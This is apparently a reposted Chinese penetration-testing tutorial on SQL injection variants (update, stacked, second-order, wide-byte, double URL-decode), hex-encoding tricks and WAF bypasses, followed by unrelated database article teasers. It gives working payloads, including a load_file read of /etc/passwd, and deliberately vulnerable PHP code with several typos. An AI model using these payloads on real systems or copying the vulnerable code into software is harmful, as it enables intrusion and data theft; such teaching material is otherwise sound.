渗透测试-SQL注入-其它注入


一、更新注入

所有更新类操作只返回布尔型结果,不会返回数据,所以核心是构造报错注入的Payload

insert into users(username,password,role) values('fjc667' or updatexml(1,concat(0x7e,database(),0x7e),1) or '','123456','user')

update users set username = 'jcjc' where userid=1 or updatexml(1,1)
update users set password = '1111'  or updatexml(1,1) or '' where userid=1

delete from users where userid=14 or updatexml(1,1)

更新类的注入适用于HTTP头注入(无论哪里注入,只要其字段可以操作到数据库就行)

二、堆叠注入

select * from users where userid=1; update user set password='123456789' where userid=1
select * from users where usernam='fjc663'; update user set password='123456789' where userid=1#'

上述Payload的PHP复现代码

include "common.php";
$conn = create_connection_oop();

$id = $_GET['id'];
$conn -> multi_query("select * from users where userid=$id");
$result = $conn -> store_result();
$rows = $result -> fecth_row();
var_dumpp($rows);

三、二次注入

// 第一步:先完成注册,使用addslashes
$username = addslashes($_POST['username']);
$password = addslashes($_POST['password']);
$sql = "insert into users(username,password) values('$username','password');
$conn->query($sql);

// 第二步:修改用户密码
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "update users set password='$password' where username='$username'";
$conn->query($sql);

四、宽字节注入

正常sql语句:select * from article where articleid=‘1’;
当输入1’ 时,在addslashes函数的保护下,单引号 ’ 被加反斜杠\转义。
被转义时的sql语句:select * from article where articleid=‘1’;
当输入1%bf时,在gbk等宽字符集的环境下,%bf和用来转义的(%5c)形成新字符 狷。
注入时的sql语句:select * from article where articleid=1%bf’ and 1=1%23;
%bf与转义符号(16进制为%5c)组合成了%bf%5c形成新字符,从而吃掉了这个转义符号,导致单引号可以闭合,形成经典的注入形式。

$conn = mysqli_connect('127.0.0.1''root''123456''learn')or die("数据库连接不成功.");
mysqli_query($conn, "set names gbk");
$id = addslashes($_GET['id']);
$sql = "select * from article where articleid='$id'";
echo $sql . "<br>";
$result = mysqli_query($conn, $sql) or die("");
$article = mysqli_fetch_assoc($result);
echo $article['headline'] . "br/><hr>" . $article['content'];

对应Payload

/security/misc.php?id=1%df' union select 1,2,3,4,5,6%23

五、URL解码注入

只要字符被转换理论上就有注入的可能,现在对sql注入的防御主要也是对各类单引号,双引号,反斜杠和null加上反斜杠进行转义。
如果某个地方使用了urldecode或者rawurldecode函数的话,就会导致二次解码生成单引号引发注入。
原理是当我们提交web参数的时候,web服务器会自动对url编码进行1次解码,假设目标有了过滤,我们提交id=1%2527时候,没有带单引号(单引号url编码为%27),这时候服务器会自动解码,解码的是%25,而%25的解码结果恰好是%(百分号),就能刚好和剩下的27组合成%27,如果程序里面还有urldecode这样的解码函数的话,将会引发二次解码,这样解码后就变成id=1’,引发注入。
所以这类注入可以搜索urldecode或者rawurldecode来挖掘。

$conn = create_connection_oop();
$id = urldecode(addslashes($_GET['id']));
ecno $id . "<br/>";
$result = $conn->query("select * from users where userid='$id'");
$rows = Sresult->fetch_row();
var_dump($rows);

/security/misc.php?id=1%2527 and 1=1--+

六、奇技淫巧

闭合与逻辑

Payload: 1' or '1'='1       闭合后:id='1'or1'='1'
也可以写成:1'||'1'='1       同理也可以使用 && 表示 and
Payload: 1' or 1=1#         闭合后:id='1' or 1=1#

字符串转十六进制

所有的确定字符串,均可以使用hex函数来处理成16进制,避免引号转义

select hex('/etc/passwd');    # 输出为:2F6574632F706173737764
select load file(0x2F6574632F706173737764);

select hex('learn');
select group_concat(table_name) from information_schema.tables where table_schema=0x6C6561726E

select hex('%为什么%");
select * from article where content like 0x25E4B8BAE4BB80E4B98825;

WAF绕过

双写绕过:
select and or 等被过滤的话,可以这么构造,selselectect,anandd,
这样即使被过滤了剩余字符串也能拼接成正常语句。

大小写绕过:
SelecTAnD,0r,可用来绕过简单的过滤手段

编码绕过:
Base64,ASCII,16进制

特殊字符绕过
空格:/**/,%20,%0a,%0d,%0b,%09,%0c,select(passwd)from(user);
and:&&,   or:||
内联注释: select username from /*!users*/ /*!union*/ select 2;
00截断:sel%00ect,mysql中不会截断,但waf可能认为截断
%:sel%ect,如果是,iis+asp,百分号会被忽略

原文地址:https://blog.csdn.net/fjc0214/article/details/134820094

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


文章浏览阅读773次,点赞6次,收藏9次。【代码】c# json字符串转Oracle的insert into的小程序。
文章浏览阅读8.7k次,点赞2次,收藏17次。此现象一般定位到远端的监听服务来找问题,在远端查看监听服务状态(具体看下面的解决方案会详细呈现),服务是否开启,另外查看监听端点概要是否存在host未指向到计算名的,如无直接进入监听配置文件listener.ora内添加指向即可。2、查看监听服务状态 lsnrctl status,右边为远端端点状态,未添加host指向到计算名;1、本地及远端安装好Oracle并配置好连接,Oracle服务和监听已启动;1、远程Oracle数据库:Oracle11g R2。或者进入下述服务手动重启。,再进行远程连接即可。_ora-12541:tns:无监听程序
文章浏览阅读2.8k次。mysql脚本转化为oracle脚本_mysql建表语句转oracle
文章浏览阅读2.2k次。cx_Oracle报错:cx_Oracle DatabaseError: DPI-1047: Cannot locate a 64-bit Oracle Client library_cx_oracle.databaseerror: dpi-1047: cannot locate a 64-bit oracle client libr
文章浏览阅读1.1k次,点赞38次,收藏35次。本文深入探讨了Oracle数据库的核心要素,包括体系结构、存储结构以及各类参数。通过解析Oracle数据库的体系结构,读者可以深入了解其内部组成和工作原理。存储结构部分介绍了数据在Oracle中的存储方式,从表空间到数据文件的层层逻辑。最后,我们深入探讨了Oracle数据库中各类参数的作用和配置方法,帮助读者更好地理解和优化数据库性能。本文旨在帮助读者全面理解Oracle数据库的运作机制,为其在实践中的应用提供基础和指导。
文章浏览阅读1.5k次。默认自动收集统计信息的时间为晚上10点(周一到周五,4个小时),早上6点(周六,周日,20个小时)由于平时默认每天只收集4小时,时间有点短了,改成每天可收集8小时。oracle 18c中默认是打开的。查看当前自动收集统计信息的时间。_oracle自动收集统计信息
文章浏览阅读929次,点赞18次,收藏20次。只有assm(Automatic Shared Memory Management)模式可以使用大页,需要关闭amm(Memory Manager Process)HugePages_Free: 306 (空闲306页,已使用306-306=0页)防止oracle使用的内存交换,所以设置的大小与oracle配置的sga、pga相关。HugePages_Rsvd: 0 (操作系统承诺给oracle预留的页数)HugePages_Total: 306 (总共306页)_oracle11g 大页
文章浏览阅读801次。例如:10046:0,1,4,8,12。默认redo日志有三个,大小为50M,循环覆盖使用。redo log再覆盖之前,会被归档,形成归档日志。答:不同事件,不同级别。trace的不同级别?_oracle 日志
文章浏览阅读4.2k次,点赞84次,收藏77次。主要讲解MySQL中SQL的DDL语句,其中包括对数据库和表的一系列操作。_sql ddl 新增字段 mysql
文章浏览阅读1.1k次。ON DEMAND:仅在该物化视图“需要”被刷新了,才进行刷新(REFRESH),即更新物化视图,以保证和基表数据的一致性;ON COMMIT:一旦基表有了COMMIT,即事务提交,则立刻刷新,立刻更新物化视图,使得数据和基表一致。Method =>'C',物化视图有三种刷新方式:COMPLETE、FAST和FORCE。物化视图会占用空间,一半可用于大量数据查询时,减缓主表的查询压力使用。例如创建一个物化视图,让对接单位查询。_oracle物化视图定时刷新
文章浏览阅读713次,点赞21次,收藏18次。1.背景介绍在当今的大数据时代,数据量越来越大,传统的关系型数据库已经无法满足业务需求。因此,NoSQL数据库技术迅速崛起,成为企业和开发者的首选。Oracle NoSQL Database是Oracle公司推出的一款分布式NoSQL数据库产品,具有高性能、高可用性和易于扩展等特点。在本文中,我们将深入了解Oracle NoSQL Database的集成与开发者工具,帮助您更好地掌握这款产品的...
文章浏览阅读2.5k次,点赞2次,收藏4次。今天遇见一个问题需要将字段中包含中文字符串的筛选出来。_oracle查询包含中文字符
文章浏览阅读802次。arcmap 在oracle删除表重新创建提示表名存在解决放啊
文章浏览阅读4.3k次,点赞2次,收藏4次。Oracle连接数据库提示 ORA-12638:身份证明检索失败_ora-12638
文章浏览阅读3.4k次,点赞6次,收藏25次。etc/profile是一个全局配置文件,所有用户登录都会使用该文件构建用户环境。与windows配置环境变量是一个道理。选择Linux系统,找到适合自己系统的安装包,我的是CentOS 8 x64。接下来需要登陆Oracle账户才能下载,无账户的可以自己注册一个。Linux中export 命令用于设置或显示环境变量。模式,利用上下键到文档最后,添加以下代码。出现如图所示版本号字样,则说明安装成功。点击下载,勾选1,点击2。记住完整路径用于后面配置。找到Java并点击进去。往下翻,找到Java8。_linux安装jdk1.8
文章浏览阅读2.4w次,点赞26次,收藏109次。JDK 是的简称,也就是 Java 开发工具包。JDK 是整个 Java 的核心,其中JDK包含了 Java 运行环境(Java Runtime Envirnment,简称 JRE),Java 工具(比如 javac、java、javap 等等),以及 Java 基础类库(比如 rt.jar)。最主流的 JDK 是Oracle公司发布的 JDK,除了 Oracle JDK(商业化,更稳定)之外,还有很多公司和组织开发了属于自己的 JDK,比较有名的有IBM JDK(更适合 IBM) 和OpenJDK。_jdk安装教程
文章浏览阅读7.5w次。出现 “java.sql.SQLNonTransientConnectionException:Could not create connection to database server” 的错误通常是由于无法连接到数据库服务器引起的。_java.sql.sqlnontransientconnectionexception: could not create connection to
文章浏览阅读849次,点赞7次,收藏10次。在ClickHouse中创建用户、数据库并进行权限分配是一个重要的管理任务,它涉及到安全性和访问控制。下面是一个基本的指南来帮助你完成这些操作:1. 创建数据库首先,需要创建一个数据库。使用以下命令:CREATE DATABASE IF NOT EXISTS your_database_name;将 your_database_name 替换为你想要的数据库名。2. 创建用户接下来,创建一个新用户。使用以下命令:CREATE USER your_username IDENTIFIED WIT_在clickhouse中如何创建用户 赋权
文章浏览阅读1.2k次,点赞53次,收藏39次。本文是一篇关于Oracle数据库安装和使用的博文摘要。作者以轻松幽默的笔调介绍了自己在实验中掌握的Oracle数据库基本操作,包括使用组件查看命令、配置数据库监听器等。作者也分享了在实验中遇到的一些有趣问题,如SQL语句缺少分号导致的意外错误。此外,作者还强调了登录sys用户和启动实例加载数据库的注意事项,并鼓励读者面对挑战时保持乐观,不断提升自己的能力。整体风格风趣严谨,引人入胜。
文章浏览阅读820次,点赞17次,收藏16次。KingbaseES、xml、dbms_xmlgen、SETSKIPROWS、人大金仓、KingbaseES兼容Oracle包dbms_xmlgen的功能是通过SQL查询将关系表中数据转化为XML文档。转化方式一共有两种:(1)通过查询字符串直接转化。(2)通过上下文句柄转化。对于通过查询字符串直接转化的方式,无法跳过若干行进行查询,只能直接将表格中的所有数据转化为XML文档。